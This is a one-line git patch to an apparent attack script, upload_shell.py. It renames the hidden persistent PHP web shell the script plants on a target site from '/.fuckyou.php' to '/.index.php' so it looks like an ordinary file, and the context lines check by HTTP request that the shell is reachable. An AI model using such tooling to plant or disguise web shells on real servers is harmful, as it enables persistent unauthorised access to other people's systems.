From 85ca75ae85f5d1300c76c02396a6e7fc852e1a52 Mon Sep 17 00:00:00 2001 From: admintony <33545069+admintony@users.noreply.github.com> Date: Thu, 16 Nov 2017 20:52:26 +0800 Subject: [PATCH] Update upload_shell.py --- Attack/upload_shell.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Attack/upload_shell.py b/Attack/upload_shell.py index 0834f7e..a29e552 100644 --- a/Attack/upload_shell.py +++ b/Attack/upload_shell.py @@ -120,7 +120,7 @@ def upload(url,method,passwd): except : pass #尝试访问不死马生成的shell - shell_url = b_url+"/.fuckyou.php" + shell_url = b_url+"/.index.php" res = requests.get(shell_url) if res.status_code!=200 : print "[-] %s create shell failed!" %bsm_url